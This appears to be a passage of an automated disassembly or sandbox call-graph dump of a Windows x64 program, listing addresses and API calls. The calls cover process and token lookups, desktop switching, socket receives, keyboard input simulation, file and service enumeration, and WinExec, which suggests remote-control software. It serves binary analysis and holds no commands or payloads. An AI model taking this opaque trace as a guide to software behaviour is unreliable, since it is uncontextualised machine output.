7ff67e829cb7 24620->24622 24623 7ff67e829c94 Process32First 24620->24623 24621->24620 24625 7ff67e829cbc FreeLibrary 24622->24625 24626 7ff67e829cc5 24622->24626 24624 7ff67e829cae CloseHandle 24623->24624 24631 7ff67e829cd0 24623->24631 24624->24622 24625->24626 24628 7ff67e877220 _getdrive 8 API calls 24626->24628 24629 7ff67e7ec40f 24628->24629 24629->24588 24629->24589 24630 7ff67e829d5a Process32Next 24630->24631 24633 7ff67e829d0b CloseHandle 24630->24633 24631->24630 24632 7ff67e829cf6 ProcessIdToSessionId 24631->24632 24631->24633 24678 7ff67e879700 24631->24678 24632->24630 24632->24631 24635 7ff67e829d26 24633->24635 24636 7ff67e829d1d FreeLibrary 24633->24636 24635->24626 24636->24635 24638 7ff67e829f28 24637->24638 24653 7ff67e829fdc 24637->24653 24641 7ff67e829f30 GetProcessWindowStation 24638->24641 24638->24653 24639 7ff67e829fec 24666 7ff67e829d80 24639->24666 24640 7ff67e829f3b 24644 7ff67e7c3730 _RunAllParam 89 API calls 24640->24644 24641->24640 24643 7ff67e829f47 GetUserObjectInformationA GetLastError SetLastError 24641->24643 24646 7ff67e829f79 RevertToSelf 24643->24646 24647 7ff67e829fae 24643->24647 24648 7ff67e82a0a9 24644->24648 24651 7ff67e7c3730 _RunAllParam 89 API calls 24646->24651 24652 7ff67e829fb7 24647->24652 24647->24653 24648->24613 24649 7ff67e82a000 GetUserNameA 24650 7ff67e82a06f 24649->24650 24654 7ff67e82a012 GetLastError 24649->24654 24656 7ff67e7c3730 _RunAllParam 89 API calls 24650->24656 24655 7ff67e829fa1 24651->24655 24657 7ff67e7c3730 _RunAllParam 89 API calls 24652->24657 24653->24639 24653->24640 24658 7ff67e82a01f 24654->24658 24659 7ff67e82a044 GetLastError 24654->24659 24655->24613 24660 7ff67e82a087 24656->24660 24661 7ff67e829fcc 24657->24661 24662 7ff67e7c3730 _RunAllParam 89 API calls 24658->24662 24663 7ff67e7c3730 _RunAllParam 89 API calls 24659->24663 24660->24613 24661->24613 24664 7ff67e82a034 24662->24664 24665 7ff67e82a062 24663->24665 24664->24613 24665->24613 24667 7ff67e829bc0 84 API calls 24666->24667 24668 7ff67e829da3 24667->24668 24669 7ff67e829da7 24668->24669 24670 7ff67e829dae OpenProcess OpenProcessToken 24668->24670 24676 7ff67e877220 _getdrive 8 API calls 24669->24676 24671 7ff67e829de7 GetTokenInformation 24670->24671 24672 7ff67e829de0 24670->24672 24674 7ff67e829ea9 CloseHandle 24671->24674 24675 7ff67e829e16 LookupAccountSidA CloseHandle CloseHandle 24671->24675 24673 7ff67e829eb7 CloseHandle 24672->24673 24673->24669 24674->24673 24675->24669 24677 7ff67e829eda 24676->24677 24677->24649 24677->24650 24679 7ff67e87970d 24678->24679 24681 7ff67e879731 24678->24681 24680 7ff67e87ffc8 _errno 70 API calls 24679->24680 24679->24681 24682 7ff67e879717 24680->24682 24683 7ff67e8849d4 _invalid_parameter_noinfo 17 API calls 24682->24683 24684 7ff67e879722 24683->24684 24684->24631 24775 7ff67e7c3770 111 API calls 2 library calls 24778 7ff67e7d0b70 89 API calls 24779 7ff67e7cab70 95 API calls _RunAllParam 24780 7ff67e7d4970 97 API calls 2 library calls 24781 7ff67e7ee780 97 API calls __wtomb_environ 24783 7ff67e7e4003 222 API calls 2 library calls 24784 7ff67e7ccf80 120 API calls 4 library calls 24785 7ff67e7cf780 71 API calls __wtomb_environ 24786 7ff67e7ddd80 121 API calls 24787 7ff67e7dbb80 122 API calls 2 library calls 24788 7ff67e7c4790 DeleteCriticalSection 24789 7ff67e7ef790 96 API calls 2 library calls 24790 7ff67e7e9390 121 API calls _RunAllParam 24792 7ff67e7cd790 11 API calls _getdrive 24794 7ff67e7d8190 125 API calls _RunAllParam 24795 7ff67e7f13a0 7 API calls 24797 7ff67e7d9ba0 SetEvent Sleep Sleep 24798 7ff67e7e4003 255 API calls 3 library calls 24800 7ff67e7eebb0 71 API calls 24801 7ff67e7ea9b0 114 API calls _getdrive 24802 7ff67e7cffb0 SetRectRgn SetRectRgn SetRectRgn 24803 7ff67e7e05b0 168 API calls _RunAllParam 24806 7ff67e7c81ad 272 API calls 2 library calls 24809 7ff67e7ef8c0 72 API calls _getdrive 24811 7ff67e7e92c0 119 API calls _RunAllParam 24813 7ff67e7d7ac0 10 API calls _RunAllParam 24815 7ff67e7e22c0 114 API calls 5 library calls 24818 7ff67e7c28d0 81 API calls 24820 7ff67e7e8ed0 127 API calls _getdrive 24821 7ff67e7d00d0 88 API calls 2 library calls 23865 7ff67e7e36d0 SetErrorMode 23866 7ff67e7e3734 23865->23866 23867 7ff67e7c3730 _RunAllParam 89 API calls 23866->23867 23868 7ff67e7e3764 GetCurrentThreadId GetThreadDesktop 23867->23868 23869 7ff67e7e3799 23868->23869 24002 7ff67e7e33a0 23869->24002 23870 7ff67e7e37b4 23871 7ff67e7e39df 23870->23871 24014 7ff67e7df940 23870->24014 23875 7ff67e877220 _getdrive 8 API calls 23871->23875 23873 7ff67e7e39ea 23874 7ff67e7c3730 _RunAllParam 89 API calls 23873->23874 23882 7ff67e7e3a11 23874->23882 23876 7ff67e7e7ff0 23875->23876 23877 7ff67e7e37ce 24029 7ff67e87851c 23877->24029 23879 7ff67e7e3825 23880 7ff67e8792a4 __wtomb_environ 70 API calls 23879->23880 23881 7ff67e7e3838 23880->23881 23883 7ff67e8792a4 __wtomb_environ 70 API calls 23881->23883 23885 7ff67e7e7ef3 23882->23885 24050 7ff67e82d170 23882->24050 23884 7ff67e7e3842 23883->23884 24035 7ff67e82a320 23884->24035 23885->23871 23888 7ff67e7c3730 _RunAllParam 89 API calls 23885->23888 23890 7ff67e7e7f3e 23888->23890 24061 7ff67e82ab00 95 API calls _RunAllParam 23890->24061 23891 7ff67e7e3a76 23893 7ff67e7c3730 _RunAllParam 89 API calls 23891->23893 23892 7ff67e7e3867 23896 7ff67e878bf4 free 70 API calls 23892->23896 23897 7ff67e7e3874 23892->23897 23895 7ff67e7e3a8e timeGetTime 23893->23895 23894 7ff67e878bf4 free 70 API calls 23894->23892 23898 7ff67e7e3aaf 23895->23898 23896->23897 23897->23871 23899 7ff67e7e3905 23897->23899 23901 7ff67e7e38d0 SleepEx 23897->23901 24054 7ff67e825f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23898->24054 23903 7ff67e7c3730 _RunAllParam 89 API calls 23899->23903 23901->23871 23901->23897 23902 7ff67e7e3abc 23904 7ff67e7e3ac0 EnterCriticalSection 23902->23904 23905 7ff67e7e3b17 _vsnprintf_l 23902->23905 23916 7ff67e7e3947 23903->23916 23909 7ff67e7e3af7 23904->23909 23908 7ff67e7e3bd1 GetComputerNameA 23905->23908 23911 7ff67e7e3c52 23908->23911 23918 7ff67e7e3bec 23908->23918 24055 7ff67e7daed0 89 API calls _vsnprintf_l 23909->24055 23913 7ff67e7e3c83 gethostname 23911->23913 23921 7ff67e7e3c57 23911->23921 23912 7ff67e7e3b0d LeaveCriticalSection 23912->23905 23914 7ff67e7e3caf 23913->23914 23913->23921 24057 7ff67e7e3220 71 API calls 2 library calls 23914->24057 24040 7ff67e82a290 23916->24040 24056 7ff67e878e5c 70 API calls 4 library calls 23918->24056 23920 7ff67e7e39c2 23920->23871 23923 7ff67e7c3730 _RunAllParam 89 API calls 23920->23923 24058 7ff67e82d710 15 API calls 23921->24058 23923->23871 23924 7ff67e7e3ec4 23924->23871 24059 7ff67e82d600 14 API calls 23924->24059 23926 7ff67e7e3eed 23926->23871 23927 7ff67e7c3730 _RunAllParam 89 API calls 23926->23927 23928 7ff67e7e3f0d EnterCriticalSection 23927->23928 23930 7ff67e8792a4 __wtomb_environ 70 API calls 23928->23930 23931 7ff67e7e3f5f CreateRectRgn 23930->23931 23932 7ff67e7e3f95 DeleteObject 23931->23932 23933 7ff67e878bf4 free 70 API calls 23932->23933 23934 7ff67e7e3faa LeaveCriticalSection 23933->23934 24060 7ff67e857d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 23934->24060 24003 7ff67e7e33c1 24002->24003 24004 7ff67e82d170 2 API calls 24003->24004 24005 7ff67e7e33cf 24004->24005 24006 7ff67e7e33d3 GetLastError 24005->24006 24009 7ff67e7e33f1 24005->24009 24007 7ff67e7c3730 _RunAllParam 89 API calls 24006->24007 24007->24009 24008 7ff67e7c3730 _RunAllParam 89 API calls 24010 7ff67e7e351a 24008->24010 24011 7ff67e7c3730 _RunAllParam 89 API calls 24009->24011 24012 7ff67e7e3441 24009->24012 24010->23870 24011->24012 24012->24008 24013 7ff67e7e349e 24012->24013 24013->23870 24019 7ff67e7df980 24014->24019 24016 7ff67e7dfb49 24020 7ff67e877220 _getdrive 8 API calls 24016->24020 24017 7ff67e7dfae6 SleepEx 24017->24019 24018 7ff67e7dfb50 24018->24016 24102 7ff67e878bbc 70 API calls swscanf 24018->24102 24019->24016 24019->24017 24019->24018 24024 7ff67e7dfa5e EnterCriticalSection 24019->24024 24062 7ff67e877c50 24019->24062 24068 7ff67e82d1f0 GetTickCount 24019->24068 24076 7ff67e82d890 24019->24076 24022 7ff67e7dfc50 24020->24022 24022->23873 24022->23877 24026 7ff67e7dfa91 LeaveCriticalSection 24024->24026 24026->24019 24027 7ff67e7dfb8c 24027->24016 24028 7ff67e7c3730 _RunAllParam 89 API calls 24027->24028 24028->24016 24030 7ff67e87854e _vsnprintf_l 24029->24030 24031 7ff67e87ffc8 _errno 70 API calls 24030->24031 24034 7ff67e878563 24030->24034 24032 7ff67e878558 24031->24032 24033 7ff67e8849d4 _invalid_parameter_noinfo 17 API calls 24032->24033 24033->24034 24034->23879 24036 7ff67e82a340 FindWindowExA 24035->24036 24037 7ff67e82a35d GetWindowThreadProcessId GetCurrentProcessId 24036->24037 24038 7ff67e7e3856 24036->24038 24037->24036 24039 7ff67e82a37c PostMessageA 24037->24039 24038->23892 24038->23894 24038->23897 24039->24038 24041 7ff67e82a2b0 24040->24041 24042 7ff67e82a303 24040->24042 24041->24042 24043 7ff67e82a2b9 FindWindowA 24041->24043 24044 7ff67e82a340 FindWindowExA 24042->24044 24045 7ff67e82a2dd PostMessageA 24043->24045 24046 7ff67e82a2cd 24043->24046 24047 7ff67e82a35d GetWindowThreadProcessId GetCurrentProcessId 24044->24047 24048 7ff67e82a392 24044->24048 24045->23920 24046->23920 24047->24044 24049 7ff67e82a37c PostMessageA 24047->24049 24048->23920 24049->24048 24051 7ff67e82d18a setsockopt 24050->24051 24052 7ff67e82d182 24050->24052 24051->24052 24053 7ff67e82d1b5 setsockopt 24051->24053 24052->23891 24053->23891 24054->23902 24055->23912 24056->23911 24057->23921 24058->23924 24059->23926 24061->23871 24063 7ff67e877c83 _vsnprintf_l 24062->24063 24064 7ff67e87ffc8 _errno 70 API calls 24063->24064 24067 7ff67e877c98 24063->24067 24065 7ff67e877c8d 24064->24065 24066 7ff67e8849d4 _invalid_parameter_noinfo 17 API calls 24065->24066 24066->24067 24067->24019 24069 7ff67e82d22f 24068->24069 24072 7ff67e82d2b6 24068->24072 24070 7ff67e82dd90 11 API calls 24069->24070 24074 7ff67e82d25b 24070->24074 24071 7ff67e82d25f 24071->24019 24072->24071 24073 7ff67e82dd90 11 API calls 24072->24073 24073->24071 24074->24071 24074->24072 24075 7ff67e82dd90 11 API calls 24074->24075 24075->24074 24077 7ff67e82d8c6 24076->24077 24078 7ff67e82d8cb 24076->24078 24077->24078 24079 7ff67e82da85 24077->24079 24080 7ff67e82d8eb 24077->24080 24078->24019 24079->24078 24081 7ff67e82dab0 WSAGetLastError 24079->24081 24082 7ff67e82da8e recv 24079->24082 24084 7ff67e82dac7 24079->24084 24083 7ff67e82d907 EnterCriticalSection 24080->24083 24086 7ff67e82d911 24080->24086 24081->24078 24081->24079 24082->24079 24083->24086 24085 7ff67e7c3730 _RunAllParam 89 API calls 24084->24085 24085->24078 24087 7ff67e82d958 24086->24087 24088 7ff67e82d986 24086->24088 24089 7ff67e7c3730 _RunAllParam 89 API calls 24087->24089 24090 7ff67e82d9c6 WSAGetLastError 24088->24090 24091 7ff67e82d99e recv 24088->24091 24092 7ff67e82da1e 24088->24092 24099 7ff67e82d96e 24089->24099 24090->24088 24094 7ff67e82d9f7 WSAGetLastError 24090->24094 24093 7ff67e82d9b4 24091->24093 24092->24078 24100 7ff67e82da77 LeaveCriticalSection 24092->24100 24093->24088 24093->24090 24096 7ff67e82d9d9 24093->24096 24097 7ff67e7c3730 _RunAllParam 89 API calls 24094->24097 24095 7ff67e82d978 LeaveCriticalSection 24095->24078 24098 7ff67e7c3730 _RunAllParam 89 API calls 24096->24098 24097->24099 24101 7ff67e82d9f1 24098->24101 24099->24078 24099->24095 24100->24078 24101->24099 24102->24027 24823 7ff67e7c56e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 24824 7ff67e7f08e0 117 API calls _RunAllParam 24826 7ff67e7f1ae0 15 API calls _getdrive 24135 7ff67e7e4cdb 24136 7ff67e82d890 97 API calls 24135->24136 24137 7ff67e7e4cfc 24136->24137 24138 7ff67e7e4d52 24137->24138 24212 7ff67e810650 24137->24212 24358 7ff67e7ef010 SetEvent 24138->24358 24141 7ff67e7e7c72 24143 7ff67e7e7c95 24141->24143 24144 7ff67e7e7c81 Sleep 24141->24144 24145 7ff67e7e7cf7 24143->24145 24146 7ff67e7e7ca6 FlushFileBuffers 24143->24146 24144->24143 24148 7ff67e7e7d59 24145->24148 24149 7ff67e7e7d08 FlushFileBuffers 24145->24149 24146->24145 24147 7ff67e7e7ce6 CloseHandle 24146->24147 24147->24145 24362 7ff67e82a3b0 93 API calls 2 library calls 24148->24362 24149->24148 24150 7ff67e7e7d48 CloseHandle 24149->24150 24150->24148 24152 7ff67e7e7d62 24154 7ff67e7e7d85 24152->24154 24363 7ff67e7f2170 16 API calls 24152->24363 24155 7ff67e7e7d9d CloseDesktop 24154->24155 24156 7ff67e7e7dbc 24154->24156 24155->24156 24159 7ff67e7e7da7 24155->24159 24166 7ff67e7c3730 _RunAllParam 89 API calls 24156->24166 24157 7ff67e7f2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 24172 7ff67e7e40c8 24157->24172 24160 7ff67e7c3730 _RunAllParam 89 API calls 24159->24160 24160->24156 24161 7ff67e7e31b0 27 API calls 24161->24172 24163 7ff67e7ec590 16 API calls 24163->24172 24164 7ff67e7e4003 24164->24141 24165 7ff67e7c3730 89 API calls _RunAllParam 24164->24165 24169 7ff67e7c3730 _RunAllParam 89 API calls 24164->24169 24164->24172 24187 7ff67e7e7c47 CloseDesktop 24164->24187 24189 7ff67e7e40bf CloseDesktop 24164->24189 24354 7ff67e82a5b0 98 API calls 2 library calls 24164->24354 24355 7ff67e82a3b0 93 API calls 2 library calls 24164->24355 24361 7ff67e7ec4e0 93 API calls _RunAllParam 24164->24361 24165->24164 24170 7ff67e7e7dfc GetModuleFileNameA 24166->24170 24167 7ff67e7e419d GetTickCount 24167->24172 24171 7ff67e7e4075 OpenInputDesktop 24169->24171 24173 7ff67e7e7e15 24170->24173 24174 7ff67e7e7e56 LoadLibraryA 24170->24174 24171->24164 24175 7ff67e7e7c54 24171->24175 24172->24141 24172->24157 24172->24161 24172->24163 24172->24164 24172->24167 24183 7ff67e82d890 97 API calls 24172->24183 24190 7ff67e7e6de8 GetLogicalDriveStringsA 24172->24190 24192 7ff67e7e7b99 LeaveCriticalSection 24172->24192 24196 7ff67e7e6e60 GetDriveTypeA 24172->24196 24198 7ff67e879f80 70 API calls 24172->24198 24201 7ff67e7e7055 SHGetMalloc 24172->24201 24202 7ff67e7e710a SetErrorMode FindFirstFileA SetErrorMode 24172->24202 24206 7ff67e82d440 16 API calls 24172->24206 24207 7ff67e7e7281 lstrlenA 24172->24207 24208 7ff67e7e733c FindNextFileA 24172->24208 24211 7ff67e82d710 15 API calls 24172->24211 24356 7ff67e8295d0 EnterCriticalSection LeaveCriticalSection 24172->24356 24357 7ff67e7ec6f0 18 API calls _RunAllParam 24172->24357 24359 7ff67e82d600 14 API calls 24172->24359 24360 7ff67e82d710 15 API calls 24172->24360 24364 7ff67e87a140 70 API calls 3 library calls 24173->24364 24177 7ff67e7e7e6b GetProcAddress 24174->24177 24178 7ff67e7e7e9d 24174->24178 24180 7ff67e7c3730 _RunAllParam 89 API calls 24175->24180 24181 7ff67e7e7e8f FreeLibrary 24177->24181 24191 7ff67e7e7edd 24178->24191 24365 7ff67e7de580 97 API calls _RunAllParam 24178->24365 24179 7ff67e7e7e26 24179->24174 24180->24141 24181->24178 24183->24172 24187->24141 24187->24175 24189->24172 24190->24172 24194 7ff67e7c3730 _RunAllParam 89 API calls 24191->24194 24203 7ff67e7e7fb2 24191->24203 24192->24164 24193 7ff67e877220 _getdrive 8 API calls 24195 7ff67e7e7ff0 24193->24195 24199 7ff67e7e7f3e 24194->24199 24196->24172 24198->24172 24366 7ff67e82ab00 95 API calls _RunAllParam 24199->24366 24201->24172 24204 7ff67e7e706a SHGetSpecialFolderLocation 24201->24204 24202->24172 24203->24193 24204->24172 24205 7ff67e7e707c SHGetPathFromIDListA 24204->24205 24205->24172 24206->24172 24207->24172 24208->24172 24209 7ff67e7e7354 FindClose 24208->24209 24209->24172 24211->24172 24213 7ff67e7c3730 _RunAllParam 89 API calls 24212->24213 24214 7ff67e81068e 24213->24214 24215 7ff67e8109af VkKeyScanA 24214->24215 24218 7ff67e7c3730 _RunAllParam 89 API calls 24214->24218 24219 7ff67e81102e 24214->24219 24216 7ff67e8109c2 24215->24216 24217 7ff67e7c3730 _RunAllParam 89 API calls 24216->24217 24220 7ff67e810a08 24217->24220 24221 7ff67e810743 24218->24221 24222 7ff67e81109a 24219->24222 24223 7ff67e7c3730 _RunAllParam 89 API calls 24219->24223 24224 7ff67e810a13 24220->24224 24225 7ff67e810d54 GetKeyState 24220->24225 24227 7ff67e7c3730 _RunAllParam 89 API calls 24221->24227 24230 7ff67e8110ee 24222->24230 24401 7ff67e812ef0 81 API calls 24222->24401 24223->24222 24226 7ff67e810d0a 24224->24226 24229 7ff67e7c3730 _RunAllParam 89 API calls 24224->24229 24228 7ff67e810d71 24225->24228 24226->24138 24227->24215 24232 7ff67e810eaa 24228->24232 24233 7ff67e810dbf 24228->24233 24235 7ff67e810a33 24229->24235 24367 7ff67e811620 24230->24367 24236 7ff67e7c3730 _RunAllParam 89 API calls 24232->24236 24238 7ff67e810dc9 GetAsyncKeyState 24233->24238 24239 7ff67e810e0a 24233->24239 24242 7ff67e7c3730 _RunAllParam 89 API calls 24235->24242 24245 7ff67e810fe2 MapVirtualKeyA 24236->24245 24237 7ff67e8110df 24402 7ff67e812370 71 API calls 24237->24402 24238->24239 24240 7ff67e810dd8 MapVirtualKeyA 24238->24240 24243 7ff67e810e58 24239->24243 24244 7ff67e810e14 GetAsyncKeyState 24239->24244 24390 7ff67e7d74c0 18 API calls 24240->24390 24241 7ff67e811108 24257 7ff67e81115f GetAsyncKeyState 24241->24257 24276 7ff67e81111e 24241->24276 24248 7ff67e810a4b 24242->24248 24251 7ff67e810e62 GetAsyncKeyState 24243->24251 24252 7ff67e810eb3 24243->24252 24244->24243 24249 7ff67e810e24 MapVirtualKeyA 24244->24249 24396 7ff67e7d74c0 18 API calls 24245->24396 24254 7ff67e810d37 24248->24254 24255 7ff67e810a58 24248->24255 24391 7ff67e7d74c0 18 API calls 24249->24391 24251->24232 24259 7ff67e810e76 MapVirtualKeyA 24251->24259 24252->24232 24262 7ff67e810ec6 GetAsyncKeyState 24252->24262 24263 7ff67e810f17 GetAsyncKeyState 24252->24263 24253 7ff67e810def 24260 7ff67e7c3730 _RunAllParam 89 API calls 24253->24260 24264 7ff67e7c3730 _RunAllParam 89 API calls 24254->24264 24265 7ff67e810b27 GetAsyncKeyState 24255->24265 24266 7ff67e810ad4 GetAsyncKeyState 24255->24266 24268 7ff67e811174 GetAsyncKeyState 24257->24268 24257->24276 24258 7ff67e811001 24397 7ff67e8102a0 109 API calls _RunAllParam 24258->24397 24392 7ff67e7d74c0 18 API calls 24259->24392 24260->24239 24261 7ff67e81124d MapVirtualKeyA 24404 7ff67e7d74c0 18 API calls 24261->24404 24262->24232 24277 7ff67e810eda MapVirtualKeyA 24262->24277 24282 7ff67e810f27 MapVirtualKeyA 24263->24282 24283 7ff67e810f62 GetAsyncKeyState 24263->24283 24264->24226 24271 7ff67e810b77 GetAsyncKeyState 24265->24271 24272 7ff67e810b3c MapVirtualKeyA 24265->24272 24278 7ff67e810aec MapVirtualKeyA 24266->24278 24279 7ff67e810b1e 24266->24279 24267 7ff67e810e3b 24280 7ff67e7c3730 _RunAllParam 89 API calls 24267->24280 24268->24276 24281 7ff67e811184 24268->24281 24271->24279 24291 7ff67e810b87 MapVirtualKeyA 24271->24291 24375 7ff67e7d74c0 18 API calls 24272->24375 24273 7ff67e810e8d 24289 7ff67e7c3730 _RunAllParam 89 API calls 24273->24289 24275 7ff67e811151 24275->24261 24276->24261 24276->24275 24393 7ff67e7d74c0 18 API calls 24277->24393 24374 7ff67e7d74c0 18 API calls 24278->24374 24293 7ff67e7c3730 _RunAllParam 89 API calls 24279->24293 24280->24243 24281->24276 24302 7ff67e7c3730 _RunAllParam 89 API calls 24281->24302 24394 7ff67e7d74c0 18 API calls 24282->24394 24283->24232 24285 7ff67e810f72 MapVirtualKeyA 24283->24285 24284 7ff67e81100a 24398 7ff67e8102a0 109 API calls _RunAllParam 24284->24398 24395 7ff67e7d74c0 18 API calls 24285->24395 24289->24232 24290 7ff67e811267 24290->24290 24376 7ff67e7d74c0 18 API calls 24291->24376 24301 7ff67e810bf1 MapVirtualKeyA 24293->24301 24296 7ff67e810b03 24305 7ff67e7c3730 _RunAllParam 89 API calls 24296->24305 24297 7ff67e811013 24399 7ff67e8102a0 109 API calls _RunAllParam 24297->24399 24298 7ff67e810b55 24307 7ff67e7c3730 _RunAllParam 89 API calls 24298->24307 24300 7ff67e810ef1 24309 7ff67e7c3730 _RunAllParam 89 API calls 24300->24309 24377 7ff67e7d74c0 18 API calls 24301->24377 24311 7ff67e8111a5 24302->24311 24303 7ff67e810f40 24312 7ff67e7c3730 _RunAllParam 89 API calls 24303->24312 24304 7ff67e810f8b 24314 7ff67e7c3730 _RunAllParam 89 API calls 24304->24314 24305->24279 24316 7ff67e810b73 24307->24316 24308 7ff67e810ba0 24317 7ff67e7c3730 _RunAllParam 89 API calls 24308->24317 24309->24232 24319 7ff67e811206 24311->24319 24320 7ff67e8111ba 24311->24320 24313 7ff67e810f5e 24312->24313 24313->24283 24314->24232 24315 7ff67e81101c 24400 7ff67e8102a0 109 API calls _RunAllParam 24315->24400 24316->24271 24317->24279 24318 7ff67e810c08 MapVirtualKeyA 24378 7ff67e7d74c0 18 API calls 24318->24378 24325 7ff67e7c3730 _RunAllParam 89 API calls 24319->24325 24335 7ff67e8111fd 24319->24335 24324 7ff67e7c3730 _RunAllParam 89 API calls 24320->24324 24320->24335 24323 7ff67e810c1f MapVirtualKeyA 24379 7ff67e7d74c0 18 API calls 24323->24379 24328 7ff67e8111ce CreateThread CloseHandle 24324->24328 24329 7ff67e81121a 24325->24329 24326 7ff67e811025 24326->24219 24328->24335 24403 7ff67e82a910 116 API calls _RunAllParam 24329->24403 24330 7ff67e7c3730 _RunAllParam 89 API calls 24333 7ff67e811230 WinExec 24330->24333 24331 7ff67e810c36 MapVirtualKeyA 24380 7ff67e7d74c0 18 API calls 24331->24380 24333->24275 24335->24330 24336 7ff67e810c53 MapVirtualKeyA 24381 7ff67e7d74c0 18 API calls 24336->24381 24338 7ff67e810c6c MapVirtualKeyA 24382 7ff67e7d74c0 18 API calls 24338->24382 24340 7ff67e810c89 MapVirtualKeyA 24383 7ff67e7d74c0 18 API calls 24340->24383 24342 7ff67e810ca2 MapVirtualKeyA 24384 7ff67e7d74c0 18 API calls 24342->24384 24344 7ff67e810cbf MapVirtualKeyA 24385 7ff67e7d74c0 18 API calls 24344->24385 24346 7ff67e810cd8 MapVirtualKeyA 24386 7ff67e7d74c0 18 API calls 24346->24386 24348 7ff67e810cef 24387 7ff67e8102a0 109 API calls _RunAllParam 24348->24387 24350 7ff67e810cf8 24388 7ff67e8102a0 109 API calls _RunAllParam 24350->24388 24352 7ff67e810d01 24389 7ff67e8102a0 109 API calls _RunAllParam 24352->24389 24354->24164 24355->24164 24357->24172 24358->24164 24359->24172 24360->24208 24361->24164 24362->24152 24364->24179 24366->24203 24368 7ff67e81163b 24367->24368 24369 7ff67e811665 24368->24369 24405 7ff67e812f30 24368->24405 24369->24241 24373 7ff67e81169c 24373->24241 24374->24296 24375->24298 24376->24308 24377->24318 24378->24323 24379->24331 24380->24336 24381->24338 24382->24340 24383->24342 24384->24344 24385->24346 24386->24348 24387->24350 24388->24352 24389->24226 24390->24253 24391->24267 24392->24273 24393->24300 24394->24303 24395->24304 24396->24258 24397->24284 24398->24297 24399->24315 24400->24326 24401->24237 24402->24230 24403->24335 24404->24290 24409 7ff67e812ff0 24405->24409 24407 7ff67e811689 24408 7ff67e812550 71 API calls 24407->24408 24408->24373 24410 7ff67e877978 81 API calls 24409->24410 24411 7ff67e813003 24410->24411 24412 7ff67e813008 24411->24412 24437 7ff67e87749c 70 API calls std::exception::exception 24411->24437 24412->24407 24414 7ff67e813043 24415 7ff67e882950 RaiseException 24414->24415 24416 7ff67e813060 GetWindowLongPtrA 24415->24416 24417 7ff67e8130b9 24416->24417 24424 7ff67e813140 24416->24424 24418 7ff67e8131ae SetWindowLongPtrA GetDlgItem 24417->24418 24421 7ff67e8130c5 24417->24421 24422 7ff67e8131de SendMessageA GetDlgItem 24418->24422 24419 7ff67e813265 EndDialog 24420 7ff67e8131a7 24419->24420 24423 7ff67e877220 _getdrive 8 API calls 24420->24423 24421->24420 24421->24424 24427 7ff67e81314a GetDlgItem SendMessageA 24421->24427 24428 7ff67e8130e4 24421->24428 24426 7ff67e81320f SetForegroundWindow 24422->24426 24425 7ff67e81328a 24423->24425 24424->24419 24425->24407 24432 7ff67e81322e 24426->24432 24430 7ff67e81318f 24427->24430 24431 7ff67e813174 SendMessageA 24427->24431 24428->24420 24429 7ff67e8130ef GetDlgItem SendMessageA 24428->24429 24429->24424 24433 7ff67e813117 SendMessageA 24429->24433 24430->24419 24431->24430 24434 7ff67e81323a GetDlgItem EnableWindow 24432->24434 24435 7ff67e81324d GetDlgItem EnableWindow 24432->24435 24433->24424 24436 7ff67e813132 24433->24436 24434->24420 24435->24420 24436->24424 24437->24414 24438 7ff67e7e80da 24457 7ff67e7d0270 24438->24457 24440 7ff67e7e81c6 24441 7ff67e8792a4 __wtomb_environ 70 API calls 24440->24441 24442 7ff67e7e81e7 CreateRectRgn 24441->24442 24464 7ff67e7c21e0 24442->24464 24444 7ff67e7e8211 LoadLibraryA 24445 7ff67e7e825e 24444->24445 24446 7ff67e7e8247 GetProcAddress 24444->24446 24447 7ff67e7c3730 _RunAllParam 89 API calls 24445->24447 24446->24445 24448 7ff67e7e828f 24447->24448 24449 7ff67e7c3730 _RunAllParam 89 API calls 24448->24449 24450 7ff67e7e82f7 24449->24450 24451 7ff67e877978 81 API calls 24450->24451 24452 7ff67e7e831e 24451->24452 24453 7ff67e877978 81 API calls 24452->24453 24454 7ff67e7e8454 24453->24454 24455 7ff67e7e8469 24454->24455 24466 7ff67e7d3fb0 24454->24466 24458 7ff67e8792a4 __wtomb_environ 70 API calls 24457->24458 24459 7ff67e7d028f CreateRectRgn 24458->24459 24460 7ff67e8792a4 __wtomb_environ 70 API calls 24459->24460 24461 7ff67e7d02b3 CreateRectRgn 24460->24461 24462 7ff67e8792a4 __wtomb_environ 70 API calls 24461->24462 24463 7ff67e7d02d7 CreateRectRgn 24462->24463 24463->24440 24465 7ff67e7c2259 24464->24465 24465->24444 24467 7ff67e7d3fe1 _vsnprintf_l 24466->24467 24468 7ff67e7d408b GetComputerNameA 24467->24468 24469 7ff67e7d40d0 LoadLibraryA 24468->24469 24470 7ff67e7d40a6 24468->24470 24471 7ff67e7d40fd 24469->24471 24472 7ff67e7d40e6 24469->24472 24470->24469 24471->24455 24474 7ff67e7ca040 8 API calls 24472->24474 24474->24471 24828 7ff67e7ed0f0 DialogBoxParamA 24829 7ff67e7e90f0 EnterCriticalSection LeaveCriticalSection 24830 7ff67e7ef6f0 10 API calls _getdrive 24832 7ff67e7da6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 24834 7ff67e7f5100 82 API calls 2 library calls 24835 7ff67e7f0700 9 API calls 23668 7ff67e7c9d00 23689 7ff67e7c29a0 23668->23689 23670 7ff67e7c9db3 OpenSCManagerA 23671 7ff67e7c9de0 EnumServicesStatusA 23670->23671 23672 7ff67e7c9dc9 23670->23672 23674 7ff67e7c9e2b GetLastError 23671->23674 23675 7ff67e7c9fed CloseServiceHandle 23671->23675 23677 7ff67e877220 _getdrive 8 API calls 23672->23677 23673 7ff67e7c9d6b 23673->23670 23674->23675 23676 7ff67e7c9e3c 23674->23676 23675->23672 23676->23675 23679 7ff67e7c9e54 EnumServicesStatusA 23676->23679 23678 7ff67e7ca017 23677->23678 23680 7ff67e7c9e93 23679->23680 23681 7ff67e7c9fe1 _RunAllParam 23679->23681 23680->23681 23682 7ff67e7c9eac OpenServiceA 23680->23682 23681->23675 23682->23681 23683 7ff67e7c9ecb QueryServiceConfigA 23682->23683 23684 7ff67e7c9ee5 GetLastError 23683->23684 23685 7ff67e7c9fc7 CloseServiceHandle 23683->23685 23684->23685 23687 7ff67e7c9ef4 _RunAllParam 23684->23687 23685->23680 23685->23681 23686 7ff67e7c9f08 QueryServiceConfigA 23686->23687 23687->23685 23687->23686 23688 7ff67e7c29a0 81 API calls 23687->23688 23688->23687 23690 